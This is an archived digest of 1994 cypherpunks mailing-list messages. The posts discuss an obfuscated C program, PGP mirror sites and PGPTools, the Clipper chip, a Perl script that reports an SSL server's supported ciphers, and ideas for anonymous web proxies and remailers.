binaries Message-ID: <9412200231.AA04630@fnord.sybgate.sybase.com> >I didn't write this program and I don't know how it works. It was posted >on the nyx freenet by kstern at nyx.cs.du.edu. When you compile and run it, >it prints out the lyrics to "The Twelve Days of Christmas". I didn't write it either, but a friend asked how the hell it did that, so I hacked on it for a couple hours and now I _do_ know how it works: it's a substitution cipher just like rot-13, coupled with a selector to print phrases in a predetermined order. This string: >"!ek;dc i at bK'(q)-[w]*%n+r3#l,{}:\nuwloca-O;m .vpbks,fxntdCeghiry" contains the substitution cipher. All the letters of the song are in the 2nd half of the string, starting at '\n'. The substitutions are the first half of the string. The program searches for a match in the index section; when it finds a match, it adds a constant to that character's array index to get the index of the character to print. Thus, searching for '!' causes '\n' to print; searching for 'e' gets 'u'. This string: >"@n'+,#'/*{}w+/w#cdnr/+,{}r/*de}+,/*{*+,/w{%+,/w#q#n+,/#{l,+,/n{n+,/+#n+,/#\ >;#q#n+,/+k#;*+,/'r :'d*'3,}{w+K w'K:'+}e#';dq#'l \ >q#'+d'K#!/+k#;q#'r}eKK#}w'r}eKK{nl]'/#;#q#n'){)#}w'){){nl]'/+#n';d}rw' i;# \ >){nl]!/n{n#'; r{#w'r nc{nl]'/#{l,+'K {rw' iK{;[{nl]'/w#q#n'wk nw' \ >iwk{KK{nl]!/w{%'l##w#' i; :{nl]'/*{q#'ld;r#n'}{nlwb!/*de}'c \ >;;{nl'-{}rw]'/+,}##'*}#nc,',#nw]'/+kd'+e}+;#'rdq#w! nr'/ ') }+}{rl#'{n' ')# \ >}'+}##(!!/" is the phrases of the song. Each '/' character is the end of a phrase: "@n'+,#'" == "On the "; "*{}w+" == "first"; "w#cdnr" == "second"; etc. The rest of the program is a selector to choose which phrase to print next. It doesn't run everywhere (it presumes its character set is 7-bit ASCII), and it depends on being invoked with no arguments. (Try it with one or two arguments -- see what happens! It redefines the standard main() argument 'argv' as an integer purely so that it can be 100% recursive, and depends on 'argc' being zero in the outermost level.) It's one busy s.o.b., too, because _every_ increment of the lookup index is a separate function call, as is the phrase selector and character printer. I gather that this was one of the entries in the "obfuscated 'C'" programming contests that used to be held some years ago. (Are they still held?) -- Elton From jthomas at access.digex.net Mon Dec 19 18:44:47 1994 From: jthomas at access.digex.net (Joe Thomas) Date: Mon, 19 Dec 94 18:44:47 PST Subject: Physical location of a machine In-Reply-To: <9412200047.AA19020@oss.stir.ac.uk> Message-ID: On Tue, 20 Dec 1994, Jonathon Fletcher wrote: > >From David Harvey's list of places holding pgp outside the us: > > ftp://ftp.uu.net/pub/security/virus/crypt/pgp > > where, physically, is this machine (country). I think it's physically in the US, about 10 miles west of me down Route 50 in Falls Church, Virginia. Anyone at UUNET, please correct me if I'm wrong... Joe From nobody at jpunix.com Mon Dec 19 19:09:28 1994 From: nobody at jpunix.com (Anonymous) Date: Mon, 19 Dec 94 19:09:28 PST Subject: No Subject Message-ID: <199412200308.VAA03397@jpunix.com> Perry, shut up already! What a fuckin' geek... From Tony.Gurnick at nzdairy.co.nz Mon Dec 19 19:25:24 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Mon, 19 Dec 94 19:25:24 PST Subject: C code contest Message-ID: <94122016230448@nzdairy.co.nz> Elton at sybase.com wrote: >I gather that this was one of the entries in the "obfuscated 'C'" >programming contests that used to be held some years ago. >(Are they still held?) Yep, Mail chongo at TOAD.COM, co-incedentally T From fain at tyto.etho.caltech.edu Mon Dec 19 21:55:00 1994 From: fain at tyto.etho.caltech.edu (Dan Fain) Date: Mon, 19 Dec 94 21:55:00 PST Subject: hiding strings in binaries In-Reply-To: <9412200231.AA04630@fnord.sybgate.sybase.com> Message-ID: > I gather that this was one of the entries in the "obfuscated 'C'" > programming contests that used to be held some years ago. (Are they > still held?) I don't know if they're still held, but for a history of the contest from 1984-1991, see Libes, Don. _Obfuscated C and Other Mysteries_. New York: Wiley, 1993. Many of the programs use Rot-13 encryption. The book describes some generally applicable principles of obfuscation. A "Twelve Days of Christmas" program was the winner of the 1988 "Least Likely to Compile Successfully" award. Dan Fain Caltech From jamesd at netcom.com Mon Dec 19 21:58:20 1994 From: jamesd at netcom.com (James A. Donald) Date: Mon, 19 Dec 94 21:58:20 PST Subject: (fwd) Newt says Clipper Chip is Dead In-Reply-To: Message-ID: James A. Donald wrote: > > On his weekly call-in TV show on National Empowerment Television tonight, > > Newt received a call asking about his opinion on the Clipper Chip, and he > > replied that it was a moot point, in that the Clipper chip concept was > > designed for a condition that no longer exists. Jonathan Rochkind wrote: > Eh? What condition is that? I don't understand. A true politician never has one clear meaning. My interpretation is that he is saying that the stable door is open and the horse has already bolted -- that it is now impossible to prevent people from communicating secretly if they wish, except by totalitarian measuresB. He has sometimes said stuff that echoes TCMay -- that the revolution in communications will transform society and undermine the power of government. Of course now that he is on the inside, rather than the outside, he may change his attitude to this coming revolution. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From jamesd at netcom.com Mon Dec 19 22:10:37 1994 From: jamesd at netcom.com (James A. Donald) Date: Mon, 19 Dec 94 22:10:37 PST Subject: freedom+diversity=noise In-Reply-To: <199412192215.RAA04833@october.ducktown.org> Message-ID: On Mon, 19 Dec 1994 mkj at october.ducktown.org wrote: > FREEDOM + DIVERSITY = NOISE > > Where "noise" is defined as any behavior(s) which a significant > portion of the group finds undesirable. The problem is not freedom and diversity, but assholes. Those who did the most for freedom, got the pants flamed off them. Namely TC May, and Netscape. Tim was flamed for not having the latest and greatest hardware -- thereby allegedly holding back the revolution, though his hardware and software is typical of 99% of the net, as I determined by looking at the way in which binaries are posted. Netscape was flamed because the first encryption that they implemented was not in accord with cypherpunk priorities (It was in accord with commercial priorities, as it should be.) --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From lcottrell at popmail.ucsd.edu Mon Dec 19 22:14:22 1994 From: lcottrell at popmail.ucsd.edu (Lance Cottrell) Date: Mon, 19 Dec 94 22:14:22 PST Subject: c'punks top 5 Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >Adam Shostack writes: >> Whats wrong with PGPtools? (A lack of documentation. Been >> a while since I looked, but I think it lacked a high level >> interface. The low level stuff is great, but on the mac, I can >> send an Appleevent "Encrypt *file recipient" and, some extended >> period later, get a response. > >It has been a while since I looked too, does it work with the 'new' format >messages generated by MIT pgp? Does anyone actually USE pgptools for any >available applications? As far as I know, nobody uses it. If nobody uses >PGPtools, then what is the reason? Either nobody really wants a PGP library >(which isn't true judging from the inquiries on cypherpunks), or something is >wrong with PGPTools. Is it the documentation like you said? Maybe some of >us should pick up where pr0duct cypher left off and enhance PGPTools. This >brings me to another point: > I use PGPTools. It is the crypto engine for Mixmaster. I have been having problems with it though. It works fine with PGP2.6 messages. > >andrew -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCUAwUBLvZ0SVVkk3dax7hlAQG6AwP42xb6cPFWhMMPY83Vv/Q6akWBCuccbEqP RaAaz/iVJHdP6WLdItPSvpZQsp0KL6+pfqAwH3IMZd0a/ixJyFAEGOQ1gr/OQjCC fKYVfH5K6C1j5GMy9dLFKbWCxKk7n/3e1is3nNtoV6kqMsJxlo3WBWgtEWOz+WrE 8EZv9EwmdA== =Wg/K -----END PGP SIGNATURE----- -------------------------------------------------- Lance Cottrell who does not speak for CASS/UCSD loki at nately.ucsd.edu PGP 2.6 key available by finger or server. Encrypted mail welcome. Home page http://nately.ucsd.edu/~loki/ Home of "chain" the remailer chaining script. For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche From hfinney at shell.portal.com Mon Dec 19 22:25:03 1994 From: hfinney at shell.portal.com (Hal) Date: Mon, 19 Dec 94 22:25:03 PST Subject: SSL server experiment Message-ID: <199412200623.WAA11611@jobe.shell.portal.com> Here is a perl script which connects to a netscape-style "https" server. The results of running it with "https.pl home1.mcom.com 443" is: Attempting connection to 198.93.93.10 Connected Sent message, length 40 Received length = 502 Message type = 4 Session ID Hit flag = 0 Certificate type = 1 Server version = 2 Certificate length = 472 Cipher specs length = 3 Conn ID length = 16 Supported ciphers: RC4_EXPORT40, 128 bits This way you can see which of the 5 cipher options (RC4 or RC2 in full and export versions, plus IDEA) are supported by any given server. You always use port 443 and just specify the machine name. I was a little surprised that Netscape's own server is only running the 40 bit version. I hope the export restrictions will not prevent the use of full strength ciphers. Here is the script, which I call https.pl: #!/usr/local/bin/perl # Perl script to test connection to http ssl port # Usage: https machine port # Standard internet stuff $AF_INET = 2; $SOCK_STREAM = 1; ($name, $aliases, $proto) = getprotobyname('tcp'); $sockaddr = 'S n a4 x8'; # Parse if (@ARGV == 2) { ($them, $port) = @ARGV; } else { die "Usage: $0 machine port\n"; } select (S); $| = 1; select (STDOUT); socket (S, $AF_INET, $SOCK_STREAM, $proto) || die "socket: $!"; ($name, $aliases, $type, $len, $thataddr) = gethostbyname($them); $that = pack ($sockaddr, $AF_INET, $port, $thataddr); @thataddr = unpack('C4', $thataddr); $thataddr = join('.', @thataddr); print "Attempting connection to $thataddr\n"; die $! unless connect (S, $that); print "Connected\n"; $cli_hello = 1; $vers = 2; $msg = pack ("C n4", $cli_hello, $vers, 5*3, 0, 16); $challenge = pack ("d2", rand, rand); #16 bytes $cspecs = pack ("Cn"x5, 1, 128, 2, 128, 3, 128, 4, 128, 5, 128); $len = 1+8+5*3+0+16 + 32768; $h = pack("n", $len); $totmsg = pack("a2 a9 a15 a16", $h, $msg, $cspecs, $challenge); print S $totmsg; print "Sent message, length ", $len-32768, "\n"; # Now for the interesting part read (S, $phd, 2); ($slen) = unpack ("n", $phd); print "Received length = ", $slen-32768, "\n"; read (S, $pm1, 11); ($smsg, $ssess, $scert, $sver, $sclen, $scspeclen, $scidlen) = unpack ("C3 n4", $pm1); print "Message type = $smsg\n"; print "Session ID Hit flag = $ssess\n"; print "Certificate type = $scert\n"; print "Server version = $sver\n"; print "Certificate length = $sclen\n"; print "Cipher specs length = $scspeclen\n"; print "Conn ID length = $scidlen\n"; if ($sclen) { read (S, $scert, $sclen); } read (S, $pspecs, $scspeclen); $nscspecs = $scspeclen / 3; @scspecs = unpack ("Cn" x $nscspecs, $pspecs); @ciphernames = ( "(undefined)", "RC4", "RC4_EXPORT40", "RC2", "RC2_EXPORT40", "IDEA" ); print "Supported ciphers:\n"; for ($i=0; $i<$nscspecs; ++$i) { printf ("\t%s, %d bits\n", @ciphernames[@scspecs[2*$i]], @scspecs[2*$i+1]); } read (S, $scid, $scidlen); close S; exit 0; From warrior at infinet.com Mon Dec 19 23:48:29 1994 From: warrior at infinet.com (Warrior) Date: Mon, 19 Dec 94 23:48:29 PST Subject: Physical location of a machine In-Reply-To: <9412200047.AA19020@oss.stir.ac.uk> Message-ID: ftp.uu.net (US)? mirrors ftp.win.tue.nl (Netherlands) which mirrors ftp.informatik.uni-hamburg.de (Germany). I think. Europeans would probably use the last two so they don't import from America. Also, ftp.win.tue.nl is faster as the uni-hamburg source is a great source for crypto, but only allows 5 users at a time. Dave On Tue, 20 Dec 1994, Jonathon Fletcher wrote: > >From David Harvey's list of places holding pgp outside the us: > ftp://ftp.uu.net/pub/security/virus/crypt/pgp > where, physically, is this machine (country). > > -Jon ___ /\ PGP the Cutting Edge of Privacy. /vvvvvvvvvvvv \-----------------------------------\ | WARRIOR ( | PGP Key Id 0XC554E447D > Magnus Frater Videt Tu `^^^^^^^^^^^^ /===================================/ \/ Finger for PGP 2.6.2 public Key. PGP Fingerprint 15 99 09 6D 11 C8 7C E0 08 C7 E6 95 46 65 FE F0 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= | Dave M. Harvey warrior at infinet.com| | PO Box 151311 dharvey at freenet.columbus.oh.us| | Columbus, OH 43215-8311 fm063 at cleveland.freenet.edu| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From lcottrell at popmail.ucsd.edu Tue Dec 20 00:06:45 1994 From: lcottrell at popmail.ucsd.edu (Lance Cottrell) Date: Tue, 20 Dec 94 00:06:45 PST Subject: Mac PGPTools Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I have a Magic Money client for the Mac, so PGPTools MUST have been ported to the Mac. Does anyone know where I might find the source for Mac PGPTools? I am starting to think about porting the Mixmaster front end to the Mac. Thanks. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLvaQflVkk3dax7hlAQHwcQP+IQrZMS05Vtw/hNJKoR9hv61joYlv2CtP pyOzWMFW5gHopc29UR1lI311MJnnj3/vDRLhVtN3hDNGl4LsS6s6xNIRPpKdeoaT 0ESSGaWq7ddmVmFmhcta9b1sX8GsoHrJbjjDXTcOEKICo+0qZlHzgtGvLfArl0or /MI7guanhH0= =FqTm -----END PGP SIGNATURE----- -------------------------------------------------- Lance Cottrell who does not speak for CASS/UCSD loki at nately.ucsd.edu PGP 2.6 key available by finger or server. Encrypted mail welcome. Home page http://nately.ucsd.edu/~loki/ Home of "chain" the remailer chaining script. For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche From skaplin at skypoint.com Tue Dec 20 00:17:13 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Tue, 20 Dec 94 00:17:13 PST Subject: scripts, recipes and things of that ilk Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Has anyone put together a compilation of all the perl and procmail scripts for integrating PGP into various mail readers? If so could you please forward a copy to me. Thanks, Sam ============================================================================== Bore, n: a person who talks when you wish him to listen. - Ambrose Bierce, "The Devil's Dictionary" 1911 ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: This message digitally signed to verify the identity of the sender iQEVAwUBLvaRVclnXxBRSgfNAQFy5gf7BrK3LAKSWvAF6kJY+vbvcjsp/xuq+Voc khzmyouW9i1JFVm5xq8htXIqcazz6Vd51y9rSqQhUpMHZqA9IsT+oom1ifpD16v4 GGv/jGDYJWq8Zz1MRO7xnCqKL0jT9kWSbkGqC/flssE5xlyI2OxTh73S+jHnj7Qh YQoDWjZ2SZVBskjkLEUFnfqARY/ExQ5PghA39ZqGQfrFAoTLPz6XxAO5l3L5oGRv cEiUpvux8lUNM2Te727HjXtnwvcf3xseBqN5ncWwfb3ftDSJX8+FyIG+i2GVKnXS pt1cYmm3jWJLxbm3OSrOrxzHQj3gXo8Ulw3Uib7rkuszNYsEnJf/SA== =d6jk -----END PGP SIGNATURE----- From skaplin at skypoint.com Tue Dec 20 00:17:19 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Tue, 20 Dec 94 00:17:19 PST Subject: Any suggestions for additions to this? (revised) In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Any suggestions or additions to this list? All of the files are now in place. Please let me know if you encounter any problems with the responder! Thanks, Sam - -------------------------------------------------------------------------- This is the index for Sam Kaplin's Auto-Responder. To get a file: Send a message to: skaplin at c2.org The the subject of the message MUST BE: SEND FILE [file_name] EXAMPLE: Subject: SEND FILE help <----Case Sensitive!!! All binary files are UUENCODED with PGP signatures. Please address all comments or problems to skaplin at skypoint.com. If you receive a blank message back, then the file you requested does not exist. Should you have a crypto related file that you would like added, contact me at: skaplin at skypoint.com. Please note that I am subject to the petty whims of the U.S. government, so I will not add any files which may be subject to ITAR. - -------------------------------------------------------------------------- File Name Description - -------------------------------------------------------------------------- apgp212_1.uue Autopgp 2.12 offline mail packet processor. Automates PGP functions. Part 1 of 4 apgp212_2.uue Autopgp 2.12 offline mail packet processor. Automates PGP functions. Part 2 of 4 apgp212_3.uue Autopgp 2.12 offline mail packet processor. Automates PGP functions. Part 3 of 4 apgp212_4.uue Autopgp 2.12 offline mail packet processor. Automates PGP functions. Part 4 of 4 apgp22b2_1.uue Autopgp 2.2b2 offline mail packet processor. Automates PGP functions. Part 1 of 4 BETA apgp22b2_2.uue Autopgp 2.2b2 offline mail packet processor. Automates PGP functions. Part 2 of 4 BETA apgp22b2_3.uue Autopgp 2.2b2 offline mail packet processor. Automates PGP functions. Part 3 of 4 BETA apgp22b2_4.uue Autopgp 2.2b2 offline mail packet processor. Automates PGP functions. Part 4 of 4 BETA cp-faq1.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 1 of 11 cp-faq2.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 2 of 11 cp-faq3.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 3 of 11 cp-faq4.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 4 of 11 cp-faq5.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 5 of 11 cp-faq6.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 6 of 11 cp-faq7.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 7 of 11 cp-faq8.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 8 of 11 cp-faq9.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 9 of 11 cp-faq10.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 10 of 11 cp-faq11.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 11 of 11 help This file. key Sam Kaplin's PGP Public keys. pgpfaq1.uue Frequently asked questions about PGP. Part 1 of 2 pgpfaq2.uue Frequently asked questions about PGP. Part 2 of 2 wherefaq Where to obtain PGP. yn075_1.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 1 of 14 yn075_2.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 2 of 14 yn075_3.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 3 of 14 yn075_4.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 4 of 14 yn075_5.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 5 of 14 yn075_6.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 6 of 14 yn075_7.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 7 of 14 yn075_8.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 8 of 14 yn075_9.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 9 of 14 yn075_10.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 10 of 14 yn075_11.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 11 of 14 yn075_12.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 12 of 14 yn075_13.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 13 of 14 yn075_14.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 14 of 14 ============================================================================== School days, I believe, are the unhappiest in the whole span of human existence. They are full of dull, unintelligible tasks, new and unpleasant ordinances, with brutal violations of common sense and common decency. --H. L. Mencken-- ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: This message digitally signed to verify the identity of the sender iQEVAwUBLvaRcMlnXxBRSgfNAQFCCAf+NP9wnLgrxyUisGOFvreotrsmcyPLI8aX gYNXE/wpClmYetwbXrtAu6wvA28z5D6db0vlx4IztVTZuGt283K8WeA3Oak4NGdT KUPzN8I57AgsaSJ2QlLAPd+WTEDc9eXEBfig9ir2c0Ngax5nb48uqHGHZthrfMUk hylYtLVmQgyMuqkT8Qc4hkM5N/ri3bSi0xAoEjKHaP0oRWatRtx+LcvuiJTtPUgp 4sorMRLoWnVk8CPiR8OkfwmRUcE1BnwnOkchc+u+VcPDuiQtApbBYHYAqIb5xNj2 l/zfYCRuy/tj6nUHxOqkrA3dArfSSdYA/q0wBEAlZ1JC3REkzy+F7Q== =8Y3x -----END PGP SIGNATURE----- From ddt at lsd.com Tue Dec 20 01:28:15 1994 From: ddt at lsd.com (Dave Del Torto) Date: Tue, 20 Dec 94 01:28:15 PST Subject: Callback phones Message-ID: At 10:19 am 12/10/94, Ben wrote: >I picked this up on the alt.2600 newsgroup. Seems like it could be used >for things like privacy enhancement if it was coupled with a credit >card/cashier's check that wasn't in your name along with perhaps a call >back loop. > >Ben. FYI: ----- The following addresses had delivery problems ----- (unrecoverable error) ----- Transcript of session follows ----- ... while talking to halcyon.halcyon.com.: >>> RCPT To: <<< 550 ... User unknown 550 ... User unknown From mark at unicorn.com Tue Dec 20 05:06:00 1994 From: mark at unicorn.com (Mark Grant) Date: Tue, 20 Dec 94 05:06:00 PST Subject: PGP Tools Message-ID: On Mon, 19 Dec 1994, Andrew Lowenstern wrote: > It has been a while since I looked too, does it work with the 'new' format > messages generated by MIT pgp? I don't think it does by default, but you can just change the code that looks for a version number to accept version 2 or 3. Works for me... > Does anyone actually USE pgptools for any > available applications? As far as I know, nobody uses it. Magic Money Privtool Mixmaster Dunno about anything else.... > Either nobody really wants a PGP library > (which isn't true judging from the inquiries on cypherpunks), or something is > wrong with PGPTools. Is it the documentation like you said? Maybe some of > us should pick up where pr0duct cypher left off and enhance PGPTools. I'd say there are three problems, firstly there's very little documentation, which isn't a problem for those of us who can read and understand the source code, but could be for more general use, secondly it's not entirely legal in the US (patents, etc) and not widely available outside (there are some versions on ftp.dsi.unimi.it, but you have to actually go looking for it if you want to find it). The other problem is that the interface is very low-level, which makes it difficult to just take a standard PGP message and decrypt it in your program. You can get around the latter by using pgplib.c from Privtool (it's been released under the GPL), however it's only really been tested on Suns at this point and may need a bit of hacking - if you port it to other machines please mail me any bugfixes. It also has some potential security problems, for example there are lots of places where it should probably zero the memory that's been used but doesn't (I've fixed most of those in my own copy). But otherwise it's a pretty good product and I'm suprised that more people don't use it. There also appears to be a bug in pgpk_findkey() such that it only looks at the first id on each key, so if you request a key by another id it fails to find it. Does anyone know if Pr0duct Cypher is still updating PGP Tools, or should I look at fixing this instead ? Mark From perry at imsi.com Tue Dec 20 05:13:14 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 20 Dec 94 05:13:14 PST Subject: No Subject In-Reply-To: <199412200308.VAA03397@jpunix.com> Message-ID: <9412201312.AA10014@snark.imsi.com> Anonymous says: > Perry, shut up already! What a fuckin' geek... Ah, my fans. Nothing is as big an ego boost, you realize, as a contentless anonymous denunciation... Perry From danisch at ira.uka.de Tue Dec 20 05:31:27 1994 From: danisch at ira.uka.de (Hadmut Danisch) Date: Tue, 20 Dec 94 05:31:27 PST Subject: Pgp in Europe Message-ID: <9412201326.AA10076@elysion.iaks.ira.uka.de> > As long as _Swedish_ law doesn't bar you from importing strong cryptography > into Sweden, you can grab PGP from wherever you like. But after access to a ftp-server inside of the states he never should go to America personally, I guess... Hadmut From nsb at nsb.fv.com Tue Dec 20 09:22:05 1994 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Tue, 20 Dec 94 09:22:05 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <4946.787881649.1@nsb.fv.com> Message-ID: Excerpts from junk.interesting: 19-Dec-94 Re: McCoy is Right! New Mai.. wcs at anchor.ho.att.com (616) > If there were a convenient MIME viewer to pop in as my PAGER, > I might have mail use it rather than less -sc, my current preference. This is precisely what metamail is for. It's in ftp://thumper.bellcore.com/pub/nsb/mm2.7.tar.Z. From entropy at IntNet.net Tue Dec 20 11:22:50 1994 From: entropy at IntNet.net (Jonathan Cooper) Date: Tue, 20 Dec 94 11:22:50 PST Subject: c'punks top 5 In-Reply-To: <9412200043.AA19009@oss.stir.ac.uk> Message-ID: > > 1. anonymous http proxy servers ("re-webbers") > > What is wanted/meant for these ? A proxy server for HTTP transport so that one could access the web anonymously. I don't think coding is the problem here; one could be easily hacked out in perl, or you could use CERN HTTPD as a proxy server. I think the problem is finding someone who will offer up their machine as a place to run this service. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://hyperreal.com/~entropy/ ]-------[ Key-ID: 4082CCB5 ) From nsb at nsb.fv.com Tue Dec 20 12:24:27 1994 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Tue, 20 Dec 94 12:24:27 PST Subject: PGP-MIME spec (No Flames Allowed!) In-Reply-To: <18602.787867142.1@nsb.fv.com> Message-ID: Excerpts from radiomail-dups: 19-Dec-94 PGP-MIME spec (No Flames Al.. "JEFF LICQUIA @mhc.uiuc. (1794*) > I've noticed Mr. Borenstein's presence here in cypherpunks; I invite him > to clarify or update as needed. I think you stated it pretty well. I think we now have someone who has stepped forward to write the new MIME-PGP draft, in consultation with Phil Zimmerman and myself. (I won't name him in public, since he may prefer to keep a low profile for now.) I'm sure that when the draft is ready, its existence will be announced on cypherpunks. -- Nathaniel From adam at bwh.harvard.edu Tue Dec 20 12:31:57 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Tue, 20 Dec 94 12:31:57 PST Subject: c'punks top 5 In-Reply-To: Message-ID: <199412202030.PAA11794@bwh.harvard.edu> Jonathan Cooper wrote: | > > 1. anonymous http proxy servers ("re-webbers") | > | > What is wanted/meant for these ? | | A proxy server for HTTP transport so that one could access the web | anonymously. I don't think coding is the problem here; one could be | easily hacked out in perl, or you could use CERN HTTPD as a proxy | server. I think the problem is finding someone who will offer up their | machine as a place to run this service. It might also be nice to encrypt the connection from client to proxy. Otherwise, this service only protects you from the server knowing who you are. If you add encryption, then it begins to offer anonymity agianst people watching the proxy. (Assuming there are multiple connections to the proxy.) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From andrew_loewenstern at il.us.swissbank.com Tue Dec 20 12:46:07 1994 From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern) Date: Tue, 20 Dec 94 12:46:07 PST Subject: c'punks top 5 Message-ID: <9412202044.AA03402@ch1d157nwk> > A proxy server for HTTP transport so that one could access the > web anonymously. I don't think coding is the problem here; one > could be easily hacked out in perl, or you could use CERN HTTPD as > a proxy server. I think the problem is finding someone who will > offer up their machine as a place to run this service. It could be run from any user account, like a remailer... The only problem there is getting it to start up after the machine has rebooted, etc. I suppose a procmail recipie or some other .forward magic could be setup so a simple e-mail message to the proxy operator account would start the server if it wasn't running. I would think that running an anonymous HTTP proxy server is much less likely to bring people screaming to your sysadmin than an anonymous remailer. Thus there is a chance that there could be more people willing to put up the service than even remailers... However, while there may be less chance of forceful shutdown due to complaints, an anon-http proxy server would probably consume much more in the way of network resources than a remailer, which will likely lead to many being shutdown once discovered by the sysadmins (although, maybe not). andrew From perry at imsi.com Tue Dec 20 12:55:04 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 20 Dec 94 12:55:04 PST Subject: c'punks top 5 In-Reply-To: <9412202044.AA03402@ch1d157nwk> Message-ID: <9412202053.AA10926@snark.imsi.com> Andrew Lowenstern says: > > A proxy server for HTTP transport so that one could access the > > web anonymously. > > It could be run from any user account, like a remailer... I'd say run socks or something similar; its a generalized port proxying facility for firewalls, but it should work fine for this. .pm From skaplin at skypoint.com Tue Dec 20 12:55:10 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Tue, 20 Dec 94 12:55:10 PST Subject: Guerrilla remailers revisited Message-ID: <1NpzkKjqR4IK075yn@skypoint.com> -----BEGIN PGP SIGNED MESSAGE----- This idea was buried in the "Rae" thread and I thought it deserved a life of its own. As we have found out, the freenets use an interface called "FREEPORT." To myself and many others this software is a mystery. I am wondering if it is possible to call procmail via a .forward file under Freeport. If this is possible, why couldn't someone write a .procmailrc file to sanitize the headers. If this was written properly, all you should have to do is drop procmail, the .procmailrc file and the .forward file in place and the remailer is up and running. The key here is will freeport call procmail through a .forward file (or some reasonable facsimile.) The downside is I only have one account which I am able to run procmail on. This account is presently acting as a forwarding mechanism for pgp-public-keys at c2.org and my auto-responder. Because of this I can't write and debug the recipe. Happy Holidays, Sam ============================================================================== Lawyer.....One who protects us against robbery by taking away the temptation. --H. L Mencken-- ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: This message digitally signed to verify the identity of the sender iQEVAwUBLvdDD8lnXxBRSgfNAQGdvwf9FAv+TvZmhEnQvchjpeN8jqm4HFNl3MX8 el/253qggYr+LJf0GaG5POkWv21oU2RU8K1h7ICGasxctNaZwqsZxuOJJAjF77Tg DdxWZ4gEGXJ8g5LkPOLN/HyWyqb2r7JOxbNt8fFRHrTAYtFD1n76QHsrzfQXRkTJ 